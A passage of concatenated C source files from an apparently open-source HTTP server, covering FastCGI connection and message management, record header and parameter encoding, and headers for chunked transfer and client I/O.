LeaveCriticalSection(&srv->msgCS);
return msg;
}
void * http_fcgisrv_msg_del (void * vsrv, uint16 msgid)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiMsg * msg = NULL;
if (!srv) return NULL;
EnterCriticalSection(&srv->msgCS);
msg = ht_delete(srv->msg_table, &msgid);
LeaveCriticalSection(&srv->msgCS);
return msg;
}
int http_fcgisrv_msg_push (void * vsrv, void * vmsg)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!srv) return -1;
if (!msg) return -2;
EnterCriticalSection(&srv->msgCS);
ar_fifo_push(srv->msg_fifo, msg);
LeaveCriticalSection(&srv->msgCS);
return 0;
}
void * http_fcgisrv_msg_pull (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiMsg * msg = NULL;
if (!srv) return NULL;
EnterCriticalSection(&srv->msgCS);
msg = ar_fifo_out(srv->msg_fifo);
LeaveCriticalSection(&srv->msgCS);
return msg;
}
int http_fcgisrv_msg_num (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
int num = 0;
if (!srv) return 0;
EnterCriticalSection(&srv->msgCS);
num = ar_fifo_num(srv->msg_fifo);
LeaveCriticalSection(&srv->msgCS);
return num;
}
int http_fcgisrv_con_add (void * vsrv, void * vpcon)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiCon * pcon = (FcgiCon *)vpcon;
if (!srv) return -1;
if (!pcon) return -2;
EnterCriticalSection(&srv->conCS);
rbtree_insert(srv->con_tree, &pcon->conid, pcon, NULL);
LeaveCriticalSection(&srv->conCS);
return 0;
}
void * http_fcgisrv_con_get (void * vsrv, ulong conid)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiCon * pcon = NULL;
if (!srv) return NULL;
EnterCriticalSection(&srv->conCS);
pcon = rbtree_get(srv->con_tree, &conid);
LeaveCriticalSection(&srv->conCS);
return pcon;
}
void * http_fcgisrv_con_del (void * vsrv, ulong conid)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiCon * pcon = NULL;
if (!srv) return NULL;
EnterCriticalSection(&srv->conCS);
pcon = rbtree_delete(srv->con_tree, &conid);
LeaveCriticalSection(&srv->conCS);
return pcon;
}
int http_fcgisrv_con_num (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
int num = 0;
if (!srv) return 0;
EnterCriticalSection(&srv->conCS);
num = rbtree_num(srv->con_tree);
LeaveCriticalSection(&srv->conCS);
return num;
}
int http_fcgisrv_lifecheck (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
HTTPMgmt * mgmt = NULL;
FcgiMsg * iter = NULL;
int msgnum = 0;
int connum = 0;
int i = 0, num = 0;
arr_t * explist = NULL;
time_t curt;
if (!srv) return -1;
mgmt = (HTTPMgmt *)srv->mgmt;
if (!mgmt) return -2;
/* srv->stamp should be updated to the current timestamp whenever network I/O occurs;
* if the network is not connected, srv->stamp retains its original value */
time(&curt);
msgnum = http_fcgisrv_msg_num(srv);
connum = http_fcgisrv_con_num(srv);
if ( msgnum == 0 && connum == 0 &&
curt > srv->stamp &&
curt - srv->stamp >= mgmt->fcgi_srv_alive_time)
{
return http_fcgisrv_close(srv);
}
EnterCriticalSection(&srv->msgCS);
num = ar_fifo_num(srv->msg_fifo);
for (i = 0; i < num; i++) {
iter = ar_fifo_value(srv->msg_fifo, i);
if (iter && curt - iter->createtime > 30) {
if (explist == NULL)
explist = arr_new(4);
arr_push(explist, ar_fifo_out(srv->msg_fifo));
num--; i--;
} else break;
}
LeaveCriticalSection(&srv->msgCS);
num = arr_num(explist);
for (i = 0; i < num; i++) {
iter = arr_value(explist, i);
http_msg_close(iter);
}
if (explist) arr_free(explist);
msgnum = http_fcgisrv_msg_num(srv);
if (connum < msgnum) {
if (connum <= 10 && msgnum <= 10) {
num = msgnum;
} else if (connum <= msgnum/2) {
num = msgnum/2;
} else {
num = msgnum * 2 / 3;
}
for (i = connum; i <= num && i <= srv->maxcon; i++) {
http_fcgisrv_connect(srv);
}
}
srv->life_timer = iotimer_start(mgmt->pcore,
mgmt->srv_check_interval * 1000,
t_fcgi_srv_life,
(void *)srv,
http_fcgisrv_pump, srv);
return 0;
}
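/* Worked example of the connection-scaling heuristic in http_fcgisrv_lifecheck()
 * above (illustrative, not part of the original source): with connum = 4 live
 * connections and msgnum = 30 queued messages, connum <= msgnum/2 holds, so the
 * target num becomes 15 and up to 12 additional connections are opened (bounded
 * by srv->maxcon). With connum = 8 and msgnum = 9, both values are <= 10, so the
 * target is msgnum = 9 and the pool grows toward roughly one connection per
 * queued message. */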
int http_fcgisrv_pump (void * vsrv, void * vobj, int event, int fdtype)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiCon * pcon = NULL;
int cmd = 0;
ulong conid = 0;
if (!srv) return -1;
switch (event) {
case IOE_INVALID_DEV:
conid = (ulong)iodev_para(vobj);
pcon = http_fcgisrv_con_get(srv, conid);
if (pcon && pcon->pdev == vobj) {
return http_fcgicon_close(pcon);
}
break;
case IOE_READ:
conid = (ulong)iodev_para(vobj);
pcon = http_fcgisrv_con_get(srv, conid);
if (pcon && pcon->pdev == vobj) {
if (fdtype == FDT_CONNECTED || fdtype == FDT_USOCK_CONNECTED) {
return http_fcgi_recv(pcon);
} else
return -1;
} else {
return -20;
}
break;
case IOE_WRITE:
conid = (ulong)iodev_para(vobj);
pcon = http_fcgisrv_con_get(srv, conid);
if (pcon && pcon->pdev == vobj) {
if (fdtype == FDT_CONNECTED || fdtype == FDT_USOCK_CONNECTED) {
return http_fcgi_send(pcon);
} else
return -1;
} else {
return -20;
}
break;
case IOE_CONNECTED:
conid = (ulong)iodev_para(vobj);
pcon = http_fcgisrv_con_get(srv, conid);
/* guard against a missing connection before locking pcon->rcvCS */
if (!pcon) return -20;
EnterCriticalSection(&pcon->rcvCS);
if (pcon->pdev == vobj) {
LeaveCriticalSection(&pcon->rcvCS);
return http_fcgicon_connected(pcon);
} else {
LeaveCriticalSection(&pcon->rcvCS);
return -20;
}
break;
case IOE_TIMEOUT:
cmd = iotimer_cmdid(vobj);
if (cmd == t_fcgi_srv_life) {
return http_fcgisrv_lifecheck(srv);
} else if (cmd == t_fcgi_srv_con_life) {
conid = (ulong)iotimer_para(vobj);
pcon = http_fcgisrv_con_get(srv, conid);
if (pcon && pcon->life_timer == vobj) {
return http_fcgi_con_lifecheck(pcon);
}
}
break;
}
return -1;
}
<|start_filename|>src/http_fcgi_msg.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_mgmt.h"
#include "http_msg.h"
#include "http_header.h"
#include "http_chunk.h"
#include "http_variable.h"
#include "http_fcgi_srv.h"
#include "http_fcgi_con.h"
#include "http_fcgi_msg.h"
int fcgi_header_type_valid (uint8 type, int resp)
{
if (!resp) {
switch (type) {
case FCGI_BEGIN_REQUEST:
case FCGI_ABORT_REQUEST:
case FCGI_PARAMS:
case FCGI_STDIN:
case FCGI_GET_VALUES:
case FCGI_UNKNOWN_TYPE:
return 1;
default:
return 0;
}
}
switch (type) {
case FCGI_END_REQUEST:
case FCGI_STDOUT:
case FCGI_STDERR:
case FCGI_GET_VALUES_RESULT:
case FCGI_UNKNOWN_TYPE:
return 1;
default:
return 0;
}
return 0;
}
int fcgi_header_decode (void * p, int len, FcgiHeader * hdr)
{
uint8 * pbyte = (uint8 *)p;
int i = 0;
uint16 val = 0;
if (!pbyte) return -1;
if (len < 8) return -2;
if (!hdr) return -3;
hdr->version = pbyte[i++];
hdr->type = pbyte[i++];
val = pbyte[i++];
val <<= 8;
val += pbyte[i++];
hdr->reqid = val;
val = pbyte[i++];
val <<= 8;
val += pbyte[i++];
hdr->contlen = val;
hdr->padding = pbyte[i++];
hdr->reserved = pbyte[i++];
return i;
}
int http_fcgimsg_cmp_fcgimsg (void * a, void *b)
{
FcgiMsg * msga = (FcgiMsg *)a;
FcgiMsg * msgb = (FcgiMsg *)b;
if (!msga) return -1;
if (!msgb) return 1;
return msga->msgid - msgb->msgid;
}
int http_fcgimsg_cmp_msgid (void * a, void *b)
{
FcgiMsg * msg = (FcgiMsg *)a;
uint16 msgid = *(uint16 *)b;
return msg->msgid - msgid;
}
ulong http_fcgimsg_hash_msgid (void * key)
{
ulong hash = *(uint16 *)key;
return hash;
}
int http_fcgimsg_init (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!msg) return -1;
msg->msgid = 0;
msg->httpmsg = NULL;
msg->req_body_flag = 0;
msg->req_body_length = 0;
msg->req_body_iolen = 0;
msg->req_stream_sent = 0;
msg->reqsent = 0;
if (msg->req_rcvs_list == NULL) {
msg->req_rcvs_list = arr_new(4);
}
arr_zero(msg->req_rcvs_list);
if (msg->req_body_chunk == NULL) {
msg->req_body_chunk = chunk_new(8192);
}
chunk_zero(msg->req_body_chunk);
msg->fcgi_role = FCGI_RESPONDER;
msg->fcgi_keep_alive = 1; //1;
if (msg->fcgi_request == NULL)
msg->fcgi_request = frame_new(512);
frame_empty(msg->fcgi_request);
msg->req_header_length = 0;
http_fcgimsg_stdin_init(msg);
memset(msg->fcgi_abort, 0, sizeof(msg->fcgi_abort));
msg->app_status = 0;
msg->proto_status = 0;
msg->got_all_header = 0;
msg->got_end_request = 0;
memset(&msg->cgihdr, 0, sizeof(msg->cgihdr));
msg->conid = 0;
msg->pcon = NULL;
msg->stamp = time(&msg->createtime);
return 0;
}
int http_fcgimsg_free (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!msg) return -1;
if (msg->req_rcvs_list) {
arr_pop_free(msg->req_rcvs_list, frame_free);
msg->req_rcvs_list = NULL;
}
if (msg->req_body_chunk) {
chunk_free(msg->req_body_chunk);
msg->req_body_chunk = NULL;
}
frame_delete(&msg->fcgi_request);
return 0;
}
void * http_fcgimsg_fetch (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
HTTPMgmt * mgmt = NULL;
FcgiMsg * msg = NULL;
if (!srv) return NULL;
mgmt = (HTTPMgmt *)srv->mgmt;
if (!mgmt) return NULL;
msg = mpool_fetch(mgmt->fcgimsg_pool);
if (!msg) {
msg = kzalloc(sizeof(*msg));
http_fcgimsg_init(msg);
}
msg->msgid = http_fcgisrv_get_msgid(srv);
msg->srv = srv;
http_fcgisrv_msg_add(srv, msg);
return msg;
}
int http_fcgimsg_recycle (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
FcgiSrv * srv = NULL;
HTTPMgmt * mgmt = NULL;
if (!msg) return -1;
srv = (FcgiSrv *)msg->srv;
if (!srv) {
return http_fcgimsg_free(msg);
}
mgmt = (HTTPMgmt *)srv->mgmt;
if (!mgmt) {
return http_fcgimsg_free(msg);
}
while (arr_num(msg->req_rcvs_list) > 0)
frame_free(arr_pop(msg->req_rcvs_list));
arr_zero(msg->req_rcvs_list);
chunk_zero(msg->req_body_chunk);
frame_empty(msg->fcgi_request);
mpool_recycle(mgmt->fcgimsg_pool, msg);
return 0;
}
void * http_fcgimsg_open (void * vsrv, void * vhttpmsg)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
HTTPMsg * httpmsg = (HTTPMsg *)vhttpmsg;
FcgiMsg * msg = NULL;
if (!srv || !httpmsg) return NULL;
msg = http_fcgimsg_fetch(srv);
if (!msg) return NULL;
msg->httpmsg = httpmsg;
msg->req_body_flag = httpmsg->req_body_flag;
msg->req_body_length = httpmsg->req_body_length;
msg->req_body_iolen = 0;
msg->req_stream_sent = 0;
msg->reqsent = 0;
http_fcgimsg_request_encode(msg);
http_fcgimsg_abort_encode(msg);
chunk_prepend_bufptr(msg->req_body_chunk, frameP(msg->fcgi_request), frameL(msg->fcgi_request), 1);
return msg;
}
int http_fcgimsg_close (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!msg) return -1;
if (http_fcgisrv_msg_del(msg->srv, msg->msgid) != msg) {
return -100;
}
return http_fcgimsg_recycle(msg);
}
int http_fcgimsg_abort (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!msg) return -1;
return 0;
}
void fcgi_header_encode (frame_p frm, uint8 type, uint16 reqid, uint16 contlen)
{
uint8 padding = 0;
frame_put_last(frm, FCGI_PROTO_VERSION);
frame_put_last(frm, type);
/* request id */
frame_put_last(frm, ((reqid >> 8) & 0xFF));
frame_put_last(frm, (reqid & 0xFF));
/* content-length */
frame_put_last(frm, ((contlen >> 8) & 0xFF));
frame_put_last(frm, (contlen & 0xFF));
padding = contlen % 8;
if (padding > 0) padding = 8 - padding;
frame_put_last(frm, padding);
frame_put_last(frm, 0x00);
}
int fcgi_header_encode2(uint8 * pbyte, uint8 type, uint16 reqid, uint16 contlen)
{
int len = 0;
uint8 padding = 0;
pbyte[len++] = FCGI_PROTO_VERSION;
pbyte[len++] = type;
/* request id */
pbyte[len++] = (reqid >> 8) & 0xFF;
pbyte[len++] = reqid & 0xFF;
/* content-length */
pbyte[len++] = (contlen >> 8) & 0xFF;
pbyte[len++] = contlen & 0xFF;
padding = contlen % 8;
if (padding > 0) padding = 8 - padding;
pbyte[len++] = padding;
pbyte[len++] = 0x00;
return len;
}
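/* Illustrative round-trip sketch, not part of the original source: shows the
 * 8-byte FastCGI record header layout handled by fcgi_header_encode2() and
 * fcgi_header_decode() (version, type, big-endian request id, big-endian
 * content length, padding, reserved). Compiled only when FCGI_HEADER_SELFTEST
 * is defined. */
#ifdef FCGI_HEADER_SELFTEST
static int fcgi_header_selftest (void)
{
    uint8      buf[8];
    FcgiHeader hdr;
    /* a 13-byte FCGI_STDIN record for request id 1 */
    fcgi_header_encode2(buf, FCGI_STDIN, 1, 13);
    if (fcgi_header_decode(buf, sizeof(buf), &hdr) != 8) return -1;
    if (hdr.type != FCGI_STDIN || hdr.reqid != 1 || hdr.contlen != 13) return -2;
    /* 13 % 8 = 5, so 3 padding bytes are expected after the content */
    return (hdr.padding == 3) ? 0 : -3;
}
#endif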
void fcgi_param_header_copy (frame_p frm, void * pbyte, int len, int isname)
{
int i;
uint8 * p = (uint8 *)pbyte;
if (!p || len <= 0) return;
for (i = 0; i < len; i++) {
if (isname) {
if (p[i] == '-')
frame_put_last(frm, '_');
else
frame_put_last(frm, adf_toupper(p[i]));
} else {
frame_put_last(frm, p[i]);
}
}
}
void fcgi_param_nvlen_encode (frame_p frm, int len)
{
if (len < 0x80) {
frame_put_last(frm, (uint8)len);
} else {
frame_put_last(frm, (uint8)( (len >> 24) | 0x80 ) );
frame_put_last(frm, (uint8)(len >> 16));
frame_put_last(frm, (uint8)(len >> 8));
frame_put_last(frm, (uint8)len);
}
}
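/* Illustrative sketch, not part of the original source: the matching decoder for
 * the FastCGI name/value length encoding produced by fcgi_param_nvlen_encode()
 * above. A length below 0x80 occupies one byte; otherwise four bytes are used
 * with the top bit of the first byte set. Returns the number of bytes consumed. */
#ifdef FCGI_PARAM_NVLEN_DECODE_SKETCH
static int fcgi_param_nvlen_decode (uint8 * p, int len, int * nvlen)
{
    if (!p || len < 1 || !nvlen) return -1;
    if ((p[0] & 0x80) == 0) {   /* short form: one byte */
        *nvlen = p[0];
        return 1;
    }
    if (len < 4) return -2;     /* long form needs four bytes */
    *nvlen = ((int)(p[0] & 0x7F) << 24) | ((int)p[1] << 16) |
             ((int)p[2] << 8)  |  (int)p[3];
    return 4;
}
#endif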
void fcgi_http_header_param_encode (frame_p frm, HTTPMsg * httpmsg)
{
int i, num;
HeaderUnit * punit = NULL;
char key[168];
strcpy(key, "HTTP_");
num = arr_num(httpmsg->req_header_list);
for (i = 0; i < num; i++) {
punit = (HeaderUnit *)arr_value(httpmsg->req_header_list, i);
if (!punit || !punit->name || punit->namelen < 1) {
continue;
}
str_secpy(key + 5, sizeof(key) - 6, HUName(punit), punit->namelen);
fcgi_param_nvlen_encode(frm, punit->namelen + 5);
fcgi_param_nvlen_encode(frm, punit->valuelen);
fcgi_param_header_copy(frm, key, punit->namelen + 5, 1);
fcgi_param_header_copy(frm, HUValue(punit), punit->valuelen, 0);
}
}
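/* Worked example (illustrative, not part of the original source): for a request
 * header "Accept-Encoding: gzip", fcgi_http_header_param_encode() emits the
 * length bytes for a 20-byte name and a 4-byte value, then the name
 * "HTTP_ACCEPT_ENCODING" (prefixed with "HTTP_", '-' mapped to '_' and letters
 * upper-cased by fcgi_param_header_copy) followed by the value "gzip". */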
void fcgi_predefined_param_encode (frame_p frm, HTTPMsg * httpmsg)
{
HTTPMgmt * mgmt = NULL;
int i, num, ret;
void * jpara = NULL;
char * name = NULL;
int namelen = 0;
char * value = NULL;
int valuelen = 0;
char buf[512];
if (!httpmsg) return;
mgmt = (HTTPMgmt *)httpmsg->httpmgmt;
if (!mgmt) return;
ret = json_mget_obj(mgmt->cnfjson, "http.fastcgi.params", -1, &jpara);
if (ret <= 0 || !jpara) return;
num = json_num(jpara);
for (i = 0; i < num; i++) {
ret = json_iter(jpara, i, (void **)&name, &namelen, (void **)&value, &valuelen, NULL);
if (ret < 0) continue;
if (!name || namelen <= 0) continue;
if (strcasecmp(name, "Content_Length") == 0) {
if (httpmsg->req_body_length == 0) {
buf[0] = '\0';
valuelen = 0;
} else {
#if defined(_WIN32) || defined(_WIN64)
sprintf(buf, "%I64d", httpmsg->req_body_length);
#else
sprintf(buf, "%lld", httpmsg->req_body_length);
#endif
valuelen = strlen(buf);
}
} else {
if (value && valuelen) {
valuelen = http_var_copy(httpmsg, value, valuelen, buf, sizeof(buf)-1,
NULL, 0, NULL, 0);
}
}
fcgi_param_nvlen_encode(frm, namelen);
fcgi_param_nvlen_encode(frm, valuelen);
fcgi_param_header_copy(frm, name, namelen, 1);
fcgi_param_header_copy(frm, buf, valuelen, 0);
}
return;
}
int http_fcgimsg_request_encode (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
int para_pos = 0;
int body_pos = 0;
int paralen = 0;
int padding = 0;
if (!msg) return -1;
/* encode begin-request header */
fcgi_header_encode(msg->fcgi_request, FCGI_BEGIN_REQUEST, 0x01/*msg->msgid*/, 8);
/* encode begin-request body */
frame_put_last(msg->fcgi_request, ((msg->fcgi_role >> 8) & 0xFF));
frame_put_last(msg->fcgi_request, (msg->fcgi_role & 0xFF));
if (msg->fcgi_keep_alive)
frame_put_last(msg->fcgi_request, 0x01);
else
frame_put_last(msg->fcgi_request, 0x00);
frame_append_nbytes(msg->fcgi_request, 0x00, 5);
para_pos = frameL(msg->fcgi_request);
/* reserved 8 bytes for FCGI-PARAM header */
frame_append_nbytes(msg->fcgi_request, 0x00, 8);
/* predefined PARAMs in configuration file encoded as FCGI_PARAM body */
fcgi_predefined_param_encode(msg->fcgi_request, msg->httpmsg);
/* HTTPMsg header encoded as FCGI_PARAM body */
fcgi_http_header_param_encode(msg->fcgi_request, msg->httpmsg);
body_pos = frameL(msg->fcgi_request) - 8;
paralen = body_pos - para_pos;
padding = paralen % 8;
if (padding > 0) padding = 8 - padding;
frame_append_nbytes(msg->fcgi_request, 0x00, padding);
/* re-encode the FCGI_PARAMS header using the actual PARAMS body length */
fcgi_header_encode2((uint8 *)frameP(msg->fcgi_request) + para_pos, FCGI_PARAMS, 1/*msg->msgid*/, paralen);
/* encode one zero-length FCGI_PARAMS header to terminate the PARAMS stream */
fcgi_header_encode(msg->fcgi_request, FCGI_PARAMS, /*msg->msgid*/1, 0);
msg->req_header_length = frameL(msg->fcgi_request);
return msg->req_header_length;
}
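/* Record layout produced by http_fcgimsg_request_encode() (illustrative summary,
 * not part of the original source):
 *   [FCGI_BEGIN_REQUEST header][8-byte body: role + keep-alive flag + reserved]
 *   [FCGI_PARAMS header][encoded name/value pairs][padding to an 8-byte boundary]
 *   [FCGI_PARAMS header with content length 0]   <- terminates the PARAMS stream
 * FCGI_STDIN records carrying the request body are encoded separately and
 * appended to msg->req_body_chunk. */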
int http_fcgimsg_abort_encode (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!msg) return -1;
return fcgi_header_encode2(msg->fcgi_abort, FCGI_ABORT_REQUEST, /*msg->msgid*/1, 0);
}
void fcgi_stdin_encode (frame_p frm, uint16 msgid, HTTPMsg * httpmsg)
{
static int MAXCONT = 65528; //65528 is 8-byte aligned, so no padding bytes need to be appended
int64 len = 0;
int64 pos = 0;
int i, num = 0;
uint16 contlen = 0;
uint8 * pbody = NULL;
pbody = frameP(httpmsg->req_body_stream);
len = httpmsg->req_body_length;
num = (len + MAXCONT - 1) / MAXCONT;
for (i = 0; i < num; i++) {
if (i == num - 1) contlen = len % MAXCONT;
else contlen = MAXCONT;
fcgi_header_encode(frm, FCGI_STDIN, msgid, contlen);
frame_put_nlast(frm, pbody + pos, contlen);
pos += contlen;
}
fcgi_header_encode(frm, FCGI_STDIN, msgid, 0);
}
int http_fcgimsg_stdin_init (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!msg) return -1;
msg->fcgi_stdin_num = 0;
memset(msg->fcgi_stdin_header, 0, sizeof(msg->fcgi_stdin_header));
memset(msg->fcgi_stdin_body, 0, sizeof(msg->fcgi_stdin_body));
memset(msg->fcgi_stdin_body_len, 0, sizeof(msg->fcgi_stdin_body_len));
memset(msg->fcgi_stdin_padding, 0, sizeof(msg->fcgi_stdin_padding));
memset(msg->fcgi_stdin_padding_len, 0, sizeof(msg->fcgi_stdin_padding_len));
return 0;
}
int http_fcgimsg_stdin_encode (void * vmsg, void * pbyte, int bytelen, int end)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
static int MAXCONT = 65528; //65528 is 8-byte aligned, so no padding bytes need to be appended
static uint8 padarr[8] = {0};
int i, pos = 0;
int num = 0;
uint16 contlen = 0;
int padding = 0;
if (!msg) return -1;
num = (bytelen + MAXCONT - 1) / MAXCONT;
for (i = 0, pos = 0; i < num && msg->fcgi_stdin_num < 32; i++) {
if (i == num - 1) contlen = bytelen % MAXCONT;
else contlen = MAXCONT;
fcgi_header_encode2(msg->fcgi_stdin_header[msg->fcgi_stdin_num], FCGI_STDIN, /*msg->msgid*/1, contlen);
msg->fcgi_stdin_body_len[msg->fcgi_stdin_num] = contlen;
msg->fcgi_stdin_body[msg->fcgi_stdin_num] = (uint8 *)pbyte + pos;
padding = contlen % 8;
if (padding > 0) padding = 8 - padding;
msg->fcgi_stdin_padding_len[msg->fcgi_stdin_num] = padding;
msg->fcgi_stdin_padding[msg->fcgi_stdin_num] = padarr;
msg->fcgi_stdin_num++;
pos += contlen;
}
if (end)
http_fcgimsg_stdin_end_encode(msg);
return pos;
}
int http_fcgimsg_stdin_end_encode (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!msg) return -1;
fcgi_header_encode2(msg->fcgi_stdin_header[msg->fcgi_stdin_num], FCGI_STDIN, /*msg->msgid*/1, 0);
msg->fcgi_stdin_body_len[msg->fcgi_stdin_num] = 0;
msg->fcgi_stdin_body[msg->fcgi_stdin_num] = NULL;
msg->fcgi_stdin_num++;
return 0;
}
int http_fcgimsg_stdin_body_sentnum (void * vmsg, int sentlen)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
int i = 0;
int sentbody = 0;
int acclen = 0;
if (!msg) return 0;
for (i = 0, sentbody = 0; i < msg->fcgi_stdin_num; i++) {
acclen += 8; //header length 8 bytes
if (acclen >= sentlen) return sentbody;
acclen += msg->fcgi_stdin_body_len[i];
if (acclen >= sentlen) {
sentbody += msg->fcgi_stdin_body_len[i] - (acclen - sentlen);
return sentbody;
}
sentbody += msg->fcgi_stdin_body_len[i];
acclen += msg->fcgi_stdin_padding_len[i];
if (acclen >= sentlen) return sentbody;
}
return sentbody;
}
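/* Worked example (illustrative, not part of the original source): suppose two
 * FCGI_STDIN records were encoded, carrying 65528 and 100 body bytes (0 and 4
 * padding bytes respectively). If sentlen = 8 + 65528 + 8 + 50 = 65594 bytes of
 * the wire stream have been sent, the loop above counts the full first body
 * (65528) plus the 50 bytes already sent from the second record and returns
 * 65578, i.e. the number of request-body bytes actually delivered so far. */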
int http_fcgimsg_pre_crash (void * vmsg, int status)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
HTTPMsg * httpmsg = NULL;
if (!msg) return -1;
if (!msg->httpmsg) return -2;
httpmsg = (HTTPMsg *)msg->httpmsg;
if (!msg->got_end_request && !httpmsg->issued) {
httpmsg->fastcgi = 0;
httpmsg->fcgimsg = NULL;
httpmsg->SetStatus(httpmsg, status, NULL);
httpmsg->Reply(httpmsg);
}
msg->httpmsg = NULL;
return 0;
}
int http_fcgimsg_stdin_encode_chunk (void * vmsg, void * pbyte, int bytelen, void * porig, int end)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
static int MAXCONT = 65528; //65528 is 8-byte aligned, so no padding bytes need to be appended
static uint8 padarr[8] = {0};
uint8 hdrbuf[16];
int i, pos = 0;
int num = 0;
uint16 contlen = 0;
int padding = 0;
if (!msg) return -1;
num = (bytelen + MAXCONT - 1) / MAXCONT;
for (i = 0, pos = 0; i < num; i++) {
if (i == num - 1) contlen = bytelen % MAXCONT;
else contlen = MAXCONT;
fcgi_header_encode2(hdrbuf, FCGI_STDIN, /*msg->msgid*/1, contlen);
chunk_add_buffer(msg->req_body_chunk, hdrbuf, 8);
chunk_add_bufptr(msg->req_body_chunk, (uint8 *)pbyte + pos, contlen, porig);
padding = contlen % 8;
if (padding > 0) padding = 8 - padding;
chunk_add_buffer(msg->req_body_chunk, padarr, padding);
pos += contlen;
}
if (end)
http_fcgimsg_stdin_end_encode_chunk(msg);
return pos;
}
int http_fcgimsg_stdin_end_encode_chunk (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
uint8 hdrbuf[16];
if (!msg) return -1;
fcgi_header_encode2(hdrbuf, FCGI_STDIN, /*msg->msgid*/1, 0);
chunk_add_buffer(msg->req_body_chunk, hdrbuf, 8);
/* set the current size as the end-size of chunk object */
chunk_set_end(msg->req_body_chunk);
return 0;
}
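/* Illustrative usage sketch, not part of the original source: splitting a request
 * body buffer into FCGI_STDIN records on msg->req_body_chunk with the two
 * chunk-based encoders above. `body` and `bodylen` are hypothetical. Compiled
 * only when FCGIMSG_STDIN_EXAMPLE is defined. */
#ifdef FCGIMSG_STDIN_EXAMPLE
static void fcgimsg_stdin_chunk_example (FcgiMsg * msg, uint8 * body, int bodylen)
{
    /* end=1 also appends the terminating zero-length FCGI_STDIN record */
    http_fcgimsg_stdin_encode_chunk(msg, body, bodylen, NULL, 1);
    /* equivalently, encode in pieces and terminate explicitly:
     *   http_fcgimsg_stdin_encode_chunk(msg, part1, len1, NULL, 0);
     *   http_fcgimsg_stdin_encode_chunk(msg, part2, len2, NULL, 0);
     *   http_fcgimsg_stdin_end_encode_chunk(msg);
     */
}
#endif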
<|start_filename|>include/http_chunk.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_CHUNK_H_
#define _HTTP_CHUNK_H_
#include "chunk.h"
#ifdef __cplusplus
extern "C" {
#endif
typedef struct http_buf {
uint8 * pbgn;
int len;
uint8 * body_bgn;
int body_len;
uint8 alloc;
} HTTPBuf;
typedef struct http_chunk_item {
int64 chksize;
int64 chklen;
int64 recvsize;
int64 recvlen;
uint8 gotall;
arr_t * buf_list;
} HTTPChunkItem;
typedef struct http_chunk {
uint8 gotall;
uint8 gotallbody;
int64 chksize; //total bytes, including the chunk size line, chunk body, chunk header and trailer
int64 chklen; //actual available content bytes
int64 recvsize; //received bytes, including the chunk size line, chunk body, chunk header and trailer
int64 recvlen; //actual available content bytes received
int chknum;
/* if the chunk got all bytes, append it to list */
HTTPChunkItem * curitem;
arr_t * item_list;
int enthdrsize;
HTTPBuf * enthdr;
chunk_t * chunk;
} HTTPChunk;
void * http_chunk_alloc ();
void http_chunk_free (void * vchk);
int http_chunk_zero (void * vchk);
void * http_chunk_dup (void * vchk);
chunk_t * http_chunk_obj (void * vchk);
int http_chunk_add_bufptr (void * vchk, void * pbgn, int len, int * rmlen);
int http_chunk_gotall (void * vchk);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_cli_io.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_CLI_IO_H_
#define _HTTP_CLI_IO_H_
#ifdef __cplusplus
extern "C" {
#endif
int http_cli_con_crash (void * vcon, int closelad);
int http_cli_accept (void * vmgmt, void * listendev);
int http_cli_recv (void * vcon);
int http_cli_recv_parse (void * vcon);
int http_reqbody_handle (void * vmsg);
int http_cli_reqbody_parse (void * vcon, void * vmsg);
int http_cli_send_probe (void * vcon);
int http_cli_send (void * vcon);
int http_cli_send_final (void * vmsg);
int http_cli_con_lifecheck (void * vcon);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_srv.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_SRV_H_
#define _HTTP_SRV_H_
#ifdef __cplusplus
extern "C" {
#endif
#define t_httpsrv_life 2201
typedef struct http_srv {
void * res[4];
ulong srvid;
char ip[41];
int port;
uint8 ssl_link;
void * sslctx;
uint8 sslctx_alloc;
int active; //0 - cannot connect, 1 - can connect
time_t active_stamp;
CRITICAL_SECTION msgCS;
void * msg_fifo;
int maxcon;
CRITICAL_SECTION conCS;
hashtab_t * con_table;
rbtree_t * con_tree;
time_t stamp;
void * life_timer;
void * mgmt;
} HTTPSrv;
